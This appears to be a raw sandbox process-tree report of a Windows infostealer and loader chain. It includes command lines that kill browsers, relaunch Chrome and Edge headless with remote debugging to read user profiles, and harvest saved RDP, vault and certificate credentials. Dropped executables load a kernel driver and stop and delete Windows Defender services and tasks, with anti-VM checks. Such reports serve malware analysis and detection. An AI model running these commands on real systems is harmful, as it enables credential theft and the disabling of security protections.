C:\Windows\system32\taskkill.exe"taskkill" /IM qqbrowser.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM browser.exe4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM msedge.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM brave.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM opera.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM vivaldi.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM firefox.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM dragon.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM maxthon.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM uc_browser.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM slimjet.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM cent_browser.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM epic.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM torch.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM whale.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM 360browser.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM qqbrowser.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM browser.exe4⤵
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq chrome.exe"4⤵
- Enumerates processes with tasklist
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=40067 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default4⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffea4cdcf8,0x7fffea4cdd04,0x7fffea4cdd105⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=2480,i,11126386270779224599,15679352919685590693,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2472 /prefetch:25⤵
- Modifies registry class
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2428,i,11126386270779224599,15679352919685590693,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2440 /prefetch:35⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2752,i,11126386270779224599,15679352919685590693,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2496 /prefetch:85⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=40067 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2968,i,11126386270779224599,15679352919685590693,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2964 /prefetch:15⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=40067 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,11126386270779224599,15679352919685590693,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3164 /prefetch:15⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=40067 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4008,i,11126386270779224599,15679352919685590693,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4004 /prefetch:15⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4548,i,11126386270779224599,15679352919685590693,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4544 /prefetch:85⤵
-
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq chrome.exe"4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe4⤵
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq msedge.exe"4⤵
- Enumerates processes with tasklist
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=41261 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x230,0x234,0x238,0x22c,0x258,0x7fffea4af208,0x7fffea4af214,0x7fffea4af2205⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=2620,i,12296133164558360504,11733037571104708979,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2612 /prefetch:25⤵
- Modifies registry class
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2460,i,12296133164558360504,11733037571104708979,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2724 /prefetch:35⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2820,i,12296133164558360504,11733037571104708979,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2812 /prefetch:85⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=41261 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3332,i,12296133164558360504,11733037571104708979,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3328 /prefetch:15⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --no-sandbox --remote-debugging-port=41261 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3544,i,12296133164558360504,11733037571104708979,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3288 /prefetch:15⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4944,i,12296133164558360504,11733037571104708979,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4940 /prefetch:85⤵
-
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq msedge.exe"4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM chrome.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM msedge.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM brave.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM opera.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM vivaldi.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM firefox.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM dragon.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM maxthon.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM uc_browser.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM slimjet.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM cent_browser.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM epic.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM torch.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM whale.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM 360browser.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM qqbrowser.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM browser.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM msedge.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM brave.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM opera.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM vivaldi.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM firefox.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM dragon.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM maxthon.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM uc_browser.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM slimjet.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM cent_browser.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM epic.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM torch.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM whale.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM 360browser.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM qqbrowser.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM browser.exe4⤵
-
-
C:\Windows\system32\vaultcmd.exe"vaultcmd" /list4⤵
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "4⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\cmdkey.exe"C:\Windows\system32\cmdkey.exe" /list5⤵
-
-
-
C:\Windows\system32\certutil.exe"certutil" -store My4⤵
-
-
C:\Windows\system32\certutil.exe"certutil" -store -user My4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-VpnConnection | ConvertTo-Json"4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "4⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list4⤵
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list:TERMSRV/69.48.201.744⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List4⤵
-
-
C:\Windows\system32\hostname.exe"hostname"4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-WmiObject Win32_VideoController | ForEach-Object { $_.Name }"4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-NetAdapter | Where-Object { $_.Status -eq 'Up' -and $_.InterfaceDescription -notmatch 'virtual|loopback' } | Sort-Object -Property LinkSpeed -Descending | Select-Object -First 1 -ExpandProperty MacAddress"4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List4⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall show allprofiles state4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6A2.tmp\6A3.tmp\6A4.bat C:\Users\Admin\AppData\Local\Temp\261.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe" go6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\78D.tmp\78E.tmp\78F.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"7⤵
- Drops file in Program Files directory
-
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
-
-
C:\Windows\system32\timeout.exetimeout /t 18⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "Sense"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "Sense"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f8⤵
- Modifies security service
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f8⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f8⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f8⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f8⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete ddrver8⤵
- Launches sc.exe
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10415960101\41ac65b24d.exe"C:\Users\Admin\AppData\Local\Temp\10415960101\41ac65b24d.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\10415970101\949e4976a3.exe"C:\Users\Admin\AppData\Local\Temp\10415970101\949e4976a3.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10415970101\949e4976a3.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\10415980101\66a00c3c2f.exe"C:\Users\Admin\AppData\Local\Temp\10415980101\66a00c3c2f.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10415980101\66a00c3c2f.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\10415990101\0d23cff48d.exe"C:\Users\Admin\AppData\Local\Temp\10415990101\0d23cff48d.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\10416000101\711619e08e.exe"C:\Users\Admin\AppData\Local\Temp\10416000101\711619e08e.exe"3⤵
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\q5UtGzxyyWAM.exe"C:\Users\Admin\AppData\Local\q5UtGzxyyWAM.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
